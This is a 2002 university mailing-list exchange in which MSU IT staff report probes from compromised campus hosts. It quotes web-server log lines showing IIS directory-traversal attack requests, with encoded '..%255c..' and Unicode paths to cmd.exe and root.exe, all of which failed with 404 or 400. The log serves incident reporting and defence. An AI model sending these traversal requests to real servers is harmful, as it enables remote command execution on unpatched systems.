Not to be a "me-too"er but I have noticed the same from the same IP addresses on one of our windows boxes. ZoneAlarm showed approximately 400 alerts since 6pm Friday until 8am this morning. Paul Donahue Lead Computer/Network Technician CVM Information Technology Center A227 VMC, Michigan State University Phone: 353-5551 Fax: 432-2937 >>> [log in to unmask] 01/21/02 08:51AM >>> Probes from these hosts started coming in just before 11:00pm Saturday night: 35.8.164.90 - bigone.hrt.msu.edu 35.8.33.189 - fpc04.nscl.msu.edu 35.8.34.114 - cycpc54.nscl.msu.edu 35.8.33.203 - talon.nscl.msu.edu 35.8.107.198 - No host name in DNS. Domain: llc, Language Learning Center in Old Hort Probe examples: 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 286 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/syste m32/cmd.exe?/c+dir HTTP/1.0" 404 343 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 -- Gene Willacker, Systems Analyst MSU Division of Housing and Food Service Food Stores Building 171 Service Road East Lansing, MI 48824-1233 517-353-1691